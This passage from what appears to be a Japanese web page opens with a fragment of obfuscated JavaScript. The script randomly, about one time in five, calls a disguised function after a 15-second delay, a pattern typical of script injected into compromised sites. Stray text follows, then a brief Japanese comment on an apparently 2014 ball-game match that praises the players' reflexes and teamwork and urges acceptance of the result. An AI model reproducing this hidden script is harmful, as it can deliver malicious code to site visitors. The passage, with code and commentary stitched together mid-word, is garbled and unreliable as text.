andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton201407ともかく一球を取り合い、走りに走る。その見事な反射神経、チームプレイには国境を超えて感動、拍手こそが相応しい。
「生き残りをかけて」「必死」に戦っても時の運。幸い結果も、受け入れてこそ大人の国であろう。